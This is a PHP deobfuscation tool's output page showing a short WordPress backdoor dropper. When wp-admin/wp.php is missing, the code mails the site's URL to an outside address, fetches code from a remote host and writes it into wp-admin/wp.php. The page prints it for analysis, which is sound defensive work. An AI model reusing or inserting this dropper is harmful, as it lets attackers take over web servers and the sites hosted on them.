Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $filename = 'wp-admin/wp.php'; $to = "[email protected]"; $subject = $_SERVER..

Decoded Output download

<?php 
 $filename = 'wp-admin/wp.php'; 
$to = "[email protected]";  
 $subject = $_SERVER['HTTP_HOST']; 
 $body = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']; 
  
if (file_exists($filename)) { 
     
} else { 
    mail($to, $subject, $body); 
$file = file_get_contents('http://viral.imus.ge/code.txt'); 
file_put_contents('wp-admin/wp.php', $file); 
 
} 
?> 
  

Did this file decode correctly?

Original Code

<?php
 $filename = 'wp-admin/wp.php';
$to = "[email protected]"; 
 $subject = $_SERVER['HTTP_HOST'];
 $body = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
 
if (file_exists($filename)) {
    
} else {
    mail($to, $subject, $body);
$file = file_get_contents('http://viral.imus.ge/code.txt');
file_put_contents('wp-admin/wp.php', $file);

}
?>
 

Function Calls

mail 1
file_exists 1

Variables

$to [email protected]
$body http://NoneNone
$subject None
$filename wp-admin/wp.php

Stats

MD5 01209c215843416a6f788f417ece169b
Eval Count 0
Decode Time 85 ms